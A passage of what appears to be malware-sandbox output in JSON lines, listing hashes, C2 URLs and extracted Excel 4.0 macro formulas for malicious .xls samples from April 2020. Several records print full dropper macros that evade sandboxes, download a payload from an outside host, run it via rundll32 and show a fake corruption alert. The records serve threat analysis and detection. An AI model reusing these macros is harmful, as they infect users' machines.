255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"fAD6u9EbXv\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"84377ff397e50b65f99e4a194a3bc8f9b3e148db76cc0be1fe15ab53bab25127"},"analysis":{"reported":"2020-04-09T16:17:24Z","score":10},"files":[{"filename":"84377ff397e50b65f99e4a194a3bc8f9b3e148db76cc0be1fe15ab53bab25127","filesize":185344,"md5":"92363d689c3acdab637ad438f20142fa","sha1":"3fdd74de2882dafa8cab307c04d983fd1c21eedb","sha256":"84377ff397e50b65f99e4a194a3bc8f9b3e148db76cc0be1fe15ab53bab25127","sha512":"b47996bbc932890e94c9cec391dbc4fbaf2003e7ce5ae73ec0554093ef8afded092e6aff7184a8655661543ebf0d1ff0ae430d5103dc15df56fa96bff38a29be","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"84377ff397e50b65f99e4a194a3bc8f9b3e148db76cc0be1fe15ab53bab25127.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8438b94b5b3dc7351c84a826379463aea5422ce3d36c3fca926dccdb2de83cbc"},"analysis":{"reported":"2020-04-09T16:17:24Z","score":10},"files":[{"filename":"8438b94b5b3dc7351c84a826379463aea5422ce3d36c3fca926dccdb2de83cbc","filesize":152576,"md5":"7d51a0fbef74c0ee73926bd690bc3e0a","sha1":"28c78c1790fc4254418e60093dd817295b0c2ab8","sha256":"8438b94b5b3dc7351c84a826379463aea5422ce3d36c3fca926dccdb2de83cbc","sha512":"6009d9178a2e36e969ba2074bb4e1aa6db5dfab785d276d268a93167b593ca507b9bcb4fc17dcc68a3fd7c7a2f12d0c1d96f1276d4b1cf09ef72028244a0d2ba","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8438b94b5b3dc7351c84a826379463aea5422ce3d36c3fca926dccdb2de83cbc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"gtO6KiogA9\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8446d76173f6d1ecc1ba5365aa285b12f9d0d00caec903b6bb5912037f025b2b"},"analysis":{"reported":"2020-04-09T16:17:24Z","score":10},"files":[{"filename":"8446d76173f6d1ecc1ba5365aa285b12f9d0d00caec903b6bb5912037f025b2b","filesize":185344,"md5":"5fd362845df4c4489e1d80177ea662c4","sha1":"e94e68b3564d4fda965126e517a9389460f9659d","sha256":"8446d76173f6d1ecc1ba5365aa285b12f9d0d00caec903b6bb5912037f025b2b","sha512":"fb01bf5a3b44a080294691f17bd06a8ddd14adf05a549785d6f80b491830fbb413aeba37424ecb1313a95be9bca14747e4bd976dcdf1fcad8e2cd34b629c5160","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8446d76173f6d1ecc1ba5365aa285b12f9d0d00caec903b6bb5912037f025b2b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"844eeb00f79c51bc0f3735689b7f680c87ef923c8274b409b48c298d40efbbcc"},"analysis":{"reported":"2020-04-09T16:17:24Z","score":10},"files":[{"filename":"844eeb00f79c51bc0f3735689b7f680c87ef923c8274b409b48c298d40efbbcc","filesize":142848,"md5":"11af32ab4d209e30f5ba027ad3bab55a","sha1":"9546ce237f1ad8467e5d085ba6c33680349d231d","sha256":"844eeb00f79c51bc0f3735689b7f680c87ef923c8274b409b48c298d40efbbcc","sha512":"72a4464109d3d8ad7d7a0397ecafd34f5d40a10181390caebcca81804f187572c8302dfbe2aa67ce6a7e7b8cd5ba4297601af573dbb2ab4618805f91b0183c95","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"844eeb00f79c51bc0f3735689b7f680c87ef923c8274b409b48c298d40efbbcc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"ukrIYsiwoZ\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"845ca4cb3b3e5047a7b88f01caf72ec389756875f1f97186fd38bdb631c183b2"},"analysis":{"reported":"2020-04-09T16:17:24Z","score":10},"files":[{"filename":"845ca4cb3b3e5047a7b88f01caf72ec389756875f1f97186fd38bdb631c183b2","filesize":206336,"md5":"53a379559762be2b9b79d1e3c7121e94","sha1":"6a570334d83f2053717b3f73546d92bab09d04f7","sha256":"845ca4cb3b3e5047a7b88f01caf72ec389756875f1f97186fd38bdb631c183b2","sha512":"e0d2ce6bcfe57926491b50bc1791340cb7dcf3ac09efd440e4d6894c7c337cb627501078026406257ebbae685138cef9bb974b0c05519450824058e22fc0ae1c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"845ca4cb3b3e5047a7b88f01caf72ec389756875f1f97186fd38bdb631c183b2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dQ2eNv9c9q\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"84706d8462e5810ecaed80941252a6e3d5d7c737a8dcc60a6735e457e17ff468"},"analysis":{"reported":"2020-04-09T16:17:24Z","score":10},"files":[{"filename":"84706d8462e5810ecaed80941252a6e3d5d7c737a8dcc60a6735e457e17ff468","filesize":112128,"md5":"90310cbe3197bac82b67b14f1de6bfe9","sha1":"d798a08f61c2395838e64a452dfddc4cedd7f7ed","sha256":"84706d8462e5810ecaed80941252a6e3d5d7c737a8dcc60a6735e457e17ff468","sha512":"d4a03a683b93241d784ed09a1f5b0274acbb7f2567dfd7a1b5939c3bad991b52c1087edbdcf7efd2e2eb2315cb1eecbbf0830b4cf81f26c20a0a97a428c2555b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"84706d8462e5810ecaed80941252a6e3d5d7c737a8dcc60a6735e457e17ff468.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"84724ac6680adfb551848e29f468114a4210270461b3e77408fb99375c64a753"},"analysis":{"reported":"2020-04-09T16:17:24Z","score":10},"files":[{"filename":"84724ac6680adfb551848e29f468114a4210270461b3e77408fb99375c64a753","filesize":185344,"md5":"4c2fa377d6255b4b6ba4806953eee769","sha1":"17ae66c970c55df3dbeb6deac814d0b82fdda9c8","sha256":"84724ac6680adfb551848e29f468114a4210270461b3e77408fb99375c64a753","sha512":"a9b92b4eb9742b7d978f15f841f500bb232379ff6307db4c69208257c8829c4ef653fa13014d6eead09505213751489442ad8d3dee9408647490335ce1d166a4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"84724ac6680adfb551848e29f468114a4210270461b3e77408fb99375c64a753.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"847651ebed0e9c2ebb5a8621689d49d28bf097d0f855f52c72961a4db7b9ebdf"},"analysis":{"reported":"2020-04-09T16:17:24Z","score":10},"files":[{"filename":"847651ebed0e9c2ebb5a8621689d49d28bf097d0f855f52c72961a4db7b9ebdf","filesize":185344,"md5":"12d049c8762f5c0020feb8cce165d0b6","sha1":"98ebe51f355231469243e9c07c55bf1e682976a3","sha256":"847651ebed0e9c2ebb5a8621689d49d28bf097d0f855f52c72961a4db7b9ebdf","sha512":"3caf8bdc10ac07e4602ece76c6e97af1c2ee8a8b8271f174fdfa4480efb49254fbafdd70314fdba924093f8107f0daabfaed8b78f478fe6f9251904ebe07f7e1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"847651ebed0e9c2ebb5a8621689d49d28bf097d0f855f52c72961a4db7b9ebdf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"847ac4e337c2475b34a6cc9e74f63a522ce98eda3c6ee6a6c95c189f12bc3561"},"analysis":{"reported":"2020-04-09T16:17:24Z","score":10},"files":[{"filename":"847ac4e337c2475b34a6cc9e74f63a522ce98eda3c6ee6a6c95c189f12bc3561","filesize":116224,"md5":"75b35dd5adae61d0bc28a66037a1443b","sha1":"0ef6ed991198abe314e298350d52f689b76f45c6","sha256":"847ac4e337c2475b34a6cc9e74f63a522ce98eda3c6ee6a6c95c189f12bc3561","sha512":"7ac2ebc2cbebc28c432023e9bc160e94f3cc8017797fd274a9a35721a11a8f1fc71e6b79cbec5840f5ad205cf8dff9ce5306f695db959d54bb42a0cba5015f19","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"847ac4e337c2475b34a6cc9e74f63a522ce98eda3c6ee6a6c95c189f12bc3561.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dOJIcn5hMj\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8486ce3a6a21e99ed105a706e02694b836668579d5beb1e075458ec879bee824"},"analysis":{"reported":"2020-04-09T16:17:24Z","score":10},"files":[{"filename":"8486ce3a6a21e99ed105a706e02694b836668579d5beb1e075458ec879bee824","filesize":112128,"md5":"4050af4b43a8a09b3d289ef1e3c6cebd","sha1":"97ffdb1dc808afa1b4c26f138f838346deb3c646","sha256":"8486ce3a6a21e99ed105a706e02694b836668579d5beb1e075458ec879bee824","sha512":"fff478bb6febba1326728e5465c1d9920067712ee01cdb15077ae47f4b134795b8f20102f159cc3cb2f81a07dae6825ce8f88078af17c04eafba6d05b16c35b1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8486ce3a6a21e99ed105a706e02694b836668579d5beb1e075458ec879bee824.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"848b853cad4d7ad6b38a556bff8e7a2f1a388923001f87ba25eb5629070c6a67"},"analysis":{"reported":"2020-04-09T16:17:24Z","score":10},"files":[{"filename":"848b853cad4d7ad6b38a556bff8e7a2f1a388923001f87ba25eb5629070c6a67","filesize":144384,"md5":"1fac6a18e6ad85013a23e61fed1a5dd0","sha1":"6f02533b946b2ae7d315c7dc7c1d3dcb9fa9b55c","sha256":"848b853cad4d7ad6b38a556bff8e7a2f1a388923001f87ba25eb5629070c6a67","sha512":"3ee60690c154bd6e2efb988bcf7b864d40d18467698e764f9bab9bd58e024651a03ac7cbd178609aad813c2451cb3a63f2b2876f628812e3955e85b2a913bd56","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"848b853cad4d7ad6b38a556bff8e7a2f1a388923001f87ba25eb5629070c6a67.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"edWMYL69mR\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"849293191debe175ff187cf1e52ff113ee2a46c3f58d0723c004d8ef94cb8938"},"analysis":{"reported":"2020-04-09T16:17:24Z","score":10},"files":[{"filename":"849293191debe175ff187cf1e52ff113ee2a46c3f58d0723c004d8ef94cb8938","filesize":167936,"md5":"2b47fdfbb944c56c856fc7ab78be5bfa","sha1":"4ce32a2f073c8076b223e9d8a729e4a94aeba2e1","sha256":"849293191debe175ff187cf1e52ff113ee2a46c3f58d0723c004d8ef94cb8938","sha512":"ff2936b3d8892a7c20d817f1e54a8b74fb8c4a4860b4929a9041171b3806c4ca8c05954c0001a53f7bd45de7d4f116b5faee9daf9ba78b4376ed5c889a5a2c08","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"849293191debe175ff187cf1e52ff113ee2a46c3f58d0723c004d8ef94cb8938.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1qoLIV9H8H\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"84aee24fd7d802bd28d7b8ecf89c91ad1c5428f7dd9a02e175621d9889a2ed65"},"analysis":{"reported":"2020-04-09T16:17:24Z","score":10},"files":[{"filename":"84aee24fd7d802bd28d7b8ecf89c91ad1c5428f7dd9a02e175621d9889a2ed65","filesize":112128,"md5":"f360029d075e7fbf08faf9ec5898671e","sha1":"acaa401322b04ab72a5d6cd7d126fcb3994d489f","sha256":"84aee24fd7d802bd28d7b8ecf89c91ad1c5428f7dd9a02e175621d9889a2ed65","sha512":"2522fb164c9164a1a24ad5f751c2bcec63bec2bb2cb43786b91f29034f39c57e5f21f854ea75fa6da13c51c409a8b851a5519db21abd2590893d833ca20a21e9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"84aee24fd7d802bd28d7b8ecf89c91ad1c5428f7dd9a02e175621d9889a2ed65.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"84b61012ae37583c84a8dd957cf5f39e9ba88c81bc7f8dd882e33e9c5b7601fb"},"analysis":{"reported":"2020-04-09T16:17:24Z","score":10},"files":[{"filename":"84b61012ae37583c84a8dd957cf5f39e9ba88c81bc7f8dd882e33e9c5b7601fb","filesize":170496,"md5":"99ad8269de57cdd36619446691c2d967","sha1":"ff753e65e2bc835350e25d00cb2577215b29e4de","sha256":"84b61012ae37583c84a8dd957cf5f39e9ba88c81bc7f8dd882e33e9c5b7601fb","sha512":"bb46e68b26a26f30779119799d2e5591f3c7ea335724823f011e2f8a97a8b9bc46a467f74782b4f16a494cb854be1375afa55897345089b8ebb9417a7ad44066","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"84b61012ae37583c84a8dd957cf5f39e9ba88c81bc7f8dd882e33e9c5b7601fb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"USyUtVrFeZ\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"84b73168e924e6c3db0afbaaa3cd16ce401b0564cf63067bcec86b417b1c90cc"},"analysis":{"reported":"2020-04-09T16:17:24Z","score":10},"files":[{"filename":"84b73168e924e6c3db0afbaaa3cd16ce401b0564cf63067bcec86b417b1c90cc","filesize":104448,"md5":"d981c95767b1b36ca543ef9d6d14d700","sha1":"853bb0dc864b41a019e4c17b8269cd1c63aa0f5a","sha256":"84b73168e924e6c3db0afbaaa3cd16ce401b0564cf63067bcec86b417b1c90cc","sha512":"bb2a7042258b5dc8d434b27d97b1400fa2f26e0029cef5538eebe9ecdfe397754a023b2faf32747c379883d1bca6634ea84b6c7234f53741a3a2bfd3a360004d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"84b73168e924e6c3db0afbaaa3cd16ce401b0564cf63067bcec86b417b1c90cc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"VqqwYRtOPm\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"84dbc25ccbdf6ce063a076953b257a9266abb23887abcb79fbf8edef8634ed5a"},"analysis":{"reported":"2020-04-09T16:17:25Z","score":10},"files":[{"filename":"84dbc25ccbdf6ce063a076953b257a9266abb23887abcb79fbf8edef8634ed5a","filesize":185344,"md5":"ab1391bc1a68c1b7f06eda1e0c22fad6","sha1":"e0958fb6e3fae3ea0d7d43d00fec21a258bab39c","sha256":"84dbc25ccbdf6ce063a076953b257a9266abb23887abcb79fbf8edef8634ed5a","sha512":"7ef1826fe4dc07554d2f97b8319e70755e80b88d0f32511b7f214d7cac9051cafde972d2e834424cb53c0c969fb4283483cfa07453a55363b872e3cc7858dafe","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"84dbc25ccbdf6ce063a076953b257a9266abb23887abcb79fbf8edef8634ed5a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"84dc5e61a7884ad165335f9cdc54bf2683af4682f38da97430bef603d10bd8d0"},"analysis":{"reported":"2020-04-09T16:17:25Z","score":10},"files":[{"filename":"84dc5e61a7884ad165335f9cdc54bf2683af4682f38da97430bef603d10bd8d0","filesize":104448,"md5":"a1a7c837a07d732a69ecc382557df79f","sha1":"ff7611dabc2d02a48ca83c77c9046668610e0706","sha256":"84dc5e61a7884ad165335f9cdc54bf2683af4682f38da97430bef603d10bd8d0","sha512":"213919bc295fb4cebbd5b11bf32e4aca52299a8ce0aa710c17d360fe1b2c82499dd7d885c979e0d898eec65b655f0c3ae331c07858a765b73cf06176059aa0a2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"84dc5e61a7884ad165335f9cdc54bf2683af4682f38da97430bef603d10bd8d0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"yqomqOvPa4\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"84dcda86f26a2c67773afa5027d79cdf0b29d40bd801345947efa5e622e22531"},"analysis":{"reported":"2020-04-09T16:17:25Z","score":10},"files":[{"filename":"84dcda86f26a2c67773afa5027d79cdf0b29d40bd801345947efa5e622e22531","filesize":170496,"md5":"c9ac462a3288edf20412ed32ab5bad25","sha1":"c1abbaa10c4962705a1096d5e7e038b69227db48","sha256":"84dcda86f26a2c67773afa5027d79cdf0b29d40bd801345947efa5e622e22531","sha512":"79fd264bd2cc4589d859820f955367e8d45a71ba18de946e0622d66447bc76491cf75d7c3e4a8cf413a4dfd995449bd5d9ad0b18a616ed2319c18e81c4d0ca17","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"84dcda86f26a2c67773afa5027d79cdf0b29d40bd801345947efa5e622e22531.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"VJMIS3LBVL\",TRUE)\nGOTO(R$0C$19)"}}}]}
